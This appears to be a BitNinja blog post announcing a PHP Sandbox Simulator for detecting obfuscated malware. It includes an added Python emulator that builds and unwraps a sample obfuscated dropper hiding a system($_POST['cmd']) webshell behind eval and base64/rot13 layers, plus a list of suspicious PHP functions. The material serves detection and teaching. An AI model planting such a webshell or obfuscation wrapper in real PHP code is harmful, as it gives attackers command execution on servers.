The Ninjas are working day and night to find the perfect solution against obfuscated malware. Last year, we invented a unique detection technique, Source Code Structure Analysis. This month, we have made another breakthrough.
BitNinja 2.25 is here, and it brings many new features, most notably a new malware scanner mechanism. With it, you can analyze the PHP files already sitting on your servers and discover even the most recent zero-day attacks, including obfuscated ones.
First, let’s discuss what obfuscated malware is.
Obfuscation attempts to hide the real intention of a program. The hacker writes code that is not readable by humans, but the functionality behind it stays the same: when you run the obfuscated program, it behaves exactly like the original program it wraps.
When we talk about malware, there are two different types of analysis: static and dynamic.
Static analysis examines the file without running it. It includes hash matching, string matching, code-based detection, and also our award-winning invention, Source Code Structure Analysis.
And what do we call dynamic analysis? During dynamic analysis, the system observes the program's behavior while the code is executed, either partially or entirely.
If you can identify the obfuscation mechanism, you can deobfuscate the code, unwrap the real program and match the deobfuscated source against your signatures. Unfortunately, there are far too many obfuscation techniques. Deobfuscation is hard, and many other aspects of a file are difficult to analyze without running the code at least partially.
Another technique is output analysis, where you examine what the program produces. Most of the time, when you run a piece of malware, you can find traces of malicious behavior in its output.
In function-call analysis, you run the code, record which functions it calls, and look for the ones that are typically used for malicious activity.
The picture shows a program that contains something fishy. It is always suspicious when a source file combines functions like explode with basic decoding routines applied to oddly named variables.
This analysis can be done on the real files or inside a simulated environment, where file manipulations can be observed safely.
You can also do multi-path execution: you analyze what would happen if you forced the interpreter into a particular code branch. With this method, you can reach code paths that are normally locked behind a condition, which is also very helpful in discovering malicious behavior.
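The following is an added example, not BitNinja's code and not part of the original post. It is a toy Python emulator that demonstrates the three ideas above on a constructed PHP sample: it evaluates chains of pure decoding functions (base64_decode, str_rot13, strrev, hex2bin, gzinflate) on constant arguments, follows every eval()/assert() whose argument it could decode into the next layer, and collects the function names called in every layer. It does not evaluate conditions at all, so code guarded by an if is treated as reachable, which is the crudest form of forcing the interpreter into a branch. The sample payload, the decoder table and the list of suspicious functions are all assumptions made for this example.

```python
import base64
import codecs
import re
import zlib

# Pure PHP decoding functions the toy emulator can evaluate on constant input.
# Bytes are carried as latin-1 strings so binary output survives untouched.
DECODERS = {
    "base64_decode": lambda s: base64.b64decode(s + "=" * (-len(s) % 4)).decode("latin-1"),
    "str_rot13": lambda s: codecs.encode(s, "rot_13"),
    "strrev": lambda s: s[::-1],
    "hex2bin": lambda s: bytes.fromhex(s).decode("latin-1"),
    "gzinflate": lambda s: zlib.decompress(s.encode("latin-1"), -15).decode("latin-1"),
}
# Functions that execute their (decoded) argument as PHP code.
CODE_SINKS = {"eval", "assert"}
# Assumed watch-list: functions whose presence in decoded code is a strong webshell signal.
SUSPICIOUS = {"eval", "assert", "system", "exec", "shell_exec", "passthru",
              "create_function", "file_put_contents", "curl_exec"}
# Language constructs that look like calls but are not functions.
CONSTRUCTS = {"if", "elseif", "while", "for", "foreach", "switch", "isset",
              "empty", "unset", "array", "list", "return", "echo", "print"}


def matching_paren(code, open_idx):
    """Index of the ')' matching code[open_idx] == '(', skipping quoted strings."""
    depth, i, quote = 0, open_idx, None
    while i < len(code):
        ch = code[i]
        if quote:
            if ch == "\\":
                i += 1
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    return -1


def resolve(expr):
    """Evaluate an expression built only from string literals and known decoders.
    Returns the resulting string, or None if anything non-constant is involved."""
    expr = expr.strip()
    m = re.fullmatch(r"(['\"])(.*)\1", expr, re.S)
    if m:
        return m.group(2)
    m = re.fullmatch(r"(\w+)\s*\((.*)\)", expr, re.S)
    if m and m.group(1) in DECODERS:
        inner = resolve(m.group(2))
        if inner is None:
            return None
        try:
            return DECODERS[m.group(1)](inner)
        except (ValueError, zlib.error):
            return None
    return None


def scan(code, max_layers=8):
    """Collect every function called in `code` and in each layer that a constant
    eval()/assert() argument unwraps to. Conditions are never evaluated, so every
    branch is treated as reachable."""
    calls, layers, pending = set(), [], [code]
    while pending and len(layers) < max_layers:
        current = pending.pop(0)
        layers.append(current)
        for m in re.finditer(r"\b([A-Za-z_]\w*)\s*\(", current):
            name = m.group(1)
            if name in CONSTRUCTS:
                continue
            calls.add(name)
            if name in CODE_SINKS:
                end = matching_paren(current, m.end() - 1)
                decoded = resolve(current[m.end():end]) if end != -1 else None
                if decoded is not None:
                    pending.append(decoded)
    return {"calls": calls, "suspicious": calls & SUSPICIOUS, "layers": layers}


# Constructed sample dropper (not real malware): two layers of encoding behind a
# request-parameter guard that a plain sandbox run would never satisfy.
PAYLOAD = 'system($_POST["cmd"]);'
INNER = 'eval(base64_decode(strrev("%s")));' % base64.b64encode(PAYLOAD.encode()).decode()[::-1]
OUTER = codecs.encode(base64.b64encode(INNER.encode()).decode(), "rot_13")
SAMPLE = '''<?php
if (isset($_GET["k"]) && $_GET["k"] == "open") {
    eval(base64_decode(str_rot13("%s")));
}
echo "ok";
''' % OUTER

if __name__ == "__main__":
    report = scan(SAMPLE)
    print("layers unwrapped:", len(report["layers"]))
    print("suspicious calls:", sorted(report["suspicious"]))
    print("final payload:", report["layers"][-1])
```

Running it reports three layers and the suspicious calls eval and system, even though the outer file never contains the string "system" and the eval sits behind a $_GET check. The scanner stops at the first non-constant argument (for example eval($_POST['x'])), which is exactly the point where a real emulator has to start modeling request data rather than just decoding strings.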
Sandboxing is one way to apply these techniques if you have a couple of dedicated servers for the purpose.
These servers spin up virtual machines; you upload the PHP file, run it, and apply the analysis methods described above. The disadvantage of sandboxing is that it takes around 20 seconds to analyze a single PHP file. Analyzing all of your PHP files this way would take a very long time and eat up too many resources.
So we added a new module to the BitNinja system, which we named Sandbox Simulator. It is a PHP emulator that runs PHP files on the server itself in a safe environment and automatically analyzes each file's behavior. It also scans the PHP files that are already on the server. With the Sandbox Simulator, we can easily discover the most recent zero-day malware, even when it is obfuscated.
In the video below, our Ninja, Mark, shows you how the PHP simulator works. You can find the malware snippet that Mark used here.
Enable the module with:

bitninjacli --module=SandboxScanner --enable

You can disable it again with:

bitninjacli --module=SandboxScanner --disable
When the PHP scanner finds a malicious file, it creates a signature from it that is waiting for validation. We described the validation process in our previous release note. Only validate signatures that were generated from files that are genuinely malware; if a signature looks suspicious, feel free to contact us so we can help you check it.
Would you like to participate in developing our most recent innovation? We still have some new ideas to improve the Malware Detection module, and we are looking for people who would like to help us test the first version and give feedback about the user experience.
If you are interested in it, reach out to our product manager, Adam.
Cybersecurity is not optional anymore. It is a must! If you haven’t tried BitNinja yet, don’t forget to register for the 7-day free trial! No credit card needed!
We are always happy to help you! If you have any questions, check out our Knowledgebase, feel free to ask at [email protected], or you can even reach us on the Dashboard chat!
Let’s make the internet a safer place together!
Start the 7-day free trial with full functionality without spending a cent.